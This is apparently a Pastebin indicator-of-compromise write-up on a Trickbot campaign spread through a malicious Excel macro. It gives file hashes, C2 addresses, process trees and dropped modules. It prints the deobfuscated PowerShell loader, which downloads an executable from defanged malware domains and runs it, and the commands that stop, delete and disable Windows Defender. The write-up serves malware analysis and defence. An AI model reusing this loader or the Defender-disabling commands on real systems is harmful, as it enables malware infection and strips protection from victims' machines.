Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #Trickbot #X97M #macro #powershell #obfuscated
- https://pastebin.com/70KhU3a4
- previous contact:
- 05/10/18 https://pastebin.com/75KNqwCf
- 02/10/18 https://pastebin.com/fm5Ug69G
- 24/09/18 https://pastebin.com/LjuNyGfn
- FAQ:
- https://myonlinesecurity.co.uk/trickbot-via-fake-deloitte-canada-tax-billing/
- https://threat.tevora.com/5-minute-forensics-decoding-powershell-payloads/
- https://radetskiy.wordpress.com/?s=trickbot
- attack_vector
- --------------
- email attach .xls > macro > cmd > powershell > GET 2 URL > $env:temp+'\tmp1806.exe
- email_headers
- --------------
- n/a
- files
- --------------
- SHA-256 2f00e0bb89d863ee7834ae9cb69d98f8e826e6d328fcdd833d91d62634f675ce
- File name Tax_Billing.xls [Composite Document File V2 Document] Type: OLE, AutoExec
- File size 57.5 KB
- SHA-256 1595ecbc00303503b974747aff928d2eacce9b249e0def2ea29ee12191cc6f1a
- File name pro.smoc > tmp1806.exe [PE32 executable (GUI) Intel 80386, for MS Windows]
- File size 313.64 KB
- activity
- **************
- deobfuscating_macro
- --------------
- cmd.exe /c powershell "'powershell ""$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''... Base64 string ...''));
- IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
- '""| out-file -filepath %tmp%\tmp9388.bat -encoding ascii; cmd /c '%tmp%\tmp9388.bat'
- @>
- powershell "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('... Base64 string ...'));
- (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
- @>
- function <#release#> TurnOn([string] $pch1){$tuc1=1;try{[System.Net.ServicePointManager]::ServerCertificateVal
- idationCallback={$true};(new-object system.net.webclient <#exim#> ).downloadfile($pch1,$env:temp+'\tmp1806.exe
- ');}catch{$tuc1=0;}return $tuc1;}$fne1=@('jumpuprecords{.} com/pro.smoc','beersforgears{.} com/pro.smoc');foreach ($
- riw in $fne1){if(TurnOn('https://'+$riw) -eq 1){break;} };<#validate#>start-process ($env:temp+'\tmp1806.exe')
- pl_src: 2
- --------------
- 69.27.37.10 jumpuprecords{.} com 404
- 192.254.185.228 beersforgears{.} com 404
- C2:
- --------------
- 190.186.39.82
- netwrk
- --------------
- ssl
- 69.27.37.10 jumpuprecords{.} com Client Hello
- 192.254.185.228 beersforgears{.} com Client Hello
- http.request.method == POST
- 190.186.39.82 190.186.39.82 POST /ser0205us/APM11_W617601.id/81/ HTTP/1.1 Mozilla/4.0 (!)
- 190.186.39.82 190.186.39.82:8082 POST /ser0205us/APM11_W617601.id/90 HTTP/1.1 test (!)
- comp
- --------------
- powershell.exe 1780 TCP 69.27.37.10 443 ESTABLISHED
- powershell.exe 1780 TCP 192.254.185.228 443 SYN_SENT
- svchost.exe 1504 TCP 46.21.249.220 443 ESTABLISHED
- svchost.exe 1504 TCP 2.21.243.40 80 ESTABLISHED
- svchost.exe 1504 TCP 47.52.62.55 443 SYN_SENT
- svchost.exe 1504 TCP 89.46.223.121 447 ESTABLISHED
- svchost.exe 1504 TCP zimbabweemergencyassistance{.} com https ESTABLISHED
- svchost.exe 1504 TCP a2-21-243-40.deploy.static.akamaitechnologies{.} com http ESTABLISHED
- proc
- --------------
- C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE /e
- C:\Windows\SysWOW64\cmd.exe /c powershell "'powershell ""$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''... Base64 string ...''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'""| out-file -filepath %tmp%\tmp9388.bat -encoding ascii; cmd /c '%tmp%\tmp9388.bat'
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "'powershell ""$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''... Base64 string ...''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'""| out-file -filepath C:\tmp\tmp9388.bat -encoding ascii; cmd /c 'C:\tmp\tmp9388.bat'
- C:\Windows\SysWOW64\cmd.exe /c C:\tmp\tmp9388.bat
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('... Base64 string ...'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
- @>
- C:\tmp\tmp1806.exe
- C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend
- C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend
- C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
- @>
- C:\Users\operator\AppData\Roaming\cleanmem\tnq1907.exe
- C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend
- C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend
- C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
- @>
- C:\Windows\system32\svchost.exe
- @>
- C:\Windows\system32\svchost.exe -k netsvcs
- C:\Windows\system32\taskeng.exe {BBC0F265-32F9-4766-909F-D34E8EEF3FFB} S-1-5-21-136527031-2493574210-1221074019-1000:APM11\operator:Interactive:[1]
- C:\Users\operator\AppData\Roaming\cleanmem\tnq1907.exe
- C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend
- C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend
- C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
- C:\Windows\system32\svchost.exe
- persist
- --------------
- Task Scheduler
- \CleanMemoryWinTask c:\users\operator\appdata\roaming\cleanmem\tnq1907.exe 06.02.2019 16:55
- drop
- --------------
- C:\Users\operator\AppData\Roaming\cleanmem\grabber_temp.INTEG.RAW
- C:\Users\operator\AppData\Roaming\cleanmem\tmp.edb
- C:\Users\operator\AppData\Roaming\cleanmem\tnq1907.exe
- C:\Users\operator\AppData\Roaming\cleanmem\vlc-qt-interface.ini
- C:\Users\operator\AppData\Roaming\cleanmem\injectDll64_configs
- C:\Users\operator\AppData\Roaming\cleanmem\mailsearcher64_configs
- C:\Users\operator\AppData\Roaming\cleanmem\networkDll64_configs
- C:\Users\operator\AppData\Roaming\cleanmem\psfin64_configs
- C:\Users\operator\AppData\Roaming\cleanmem\pwgrab64_configs
- C:\Users\operator\AppData\Roaming\cleanmem\importDll64
- C:\Users\operator\AppData\Roaming\cleanmem\injectDll64
- C:\Users\operator\AppData\Roaming\cleanmem\mailsearcher64
- C:\Users\operator\AppData\Roaming\cleanmem\networkDll64
- C:\Users\operator\AppData\Roaming\cleanmem\psfin64
- C:\Users\operator\AppData\Roaming\cleanmem\pwgrab64
- C:\Users\operator\AppData\Roaming\cleanmem\shareDll64
- C:\Users\operator\AppData\Roaming\cleanmem\systeminfo64
- C:\Users\operator\AppData\Roaming\cleanmem\wormwinDll64
- # # #
- https://www.virustotal.com/#/file/2f00e0bb89d863ee7834ae9cb69d98f8e826e6d328fcdd833d91d62634f675ce/details
- https://www.virustotal.com/#/url/240554f90c39c2c914803a8ee2c295d5c848482f82138d20a236d6b71b2c823c/details
- https://www.virustotal.com/#/url/0b963e7eb53d1d7cbca89b53b376530a92abb5bf7a5fff97f100a0545545b34d/details
- https://urlhaus.abuse.ch/url/118629/
- https://urlhaus.abuse.ch/url/118628/
- https://www.virustotal.com/#/file/1595ecbc00303503b974747aff928d2eacce9b249e0def2ea29ee12191cc6f1a/details
- https://analyze.intezer.com/#/analyses/66286e3c-deca-480c-9f36-caebee871a10
- VR
- @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement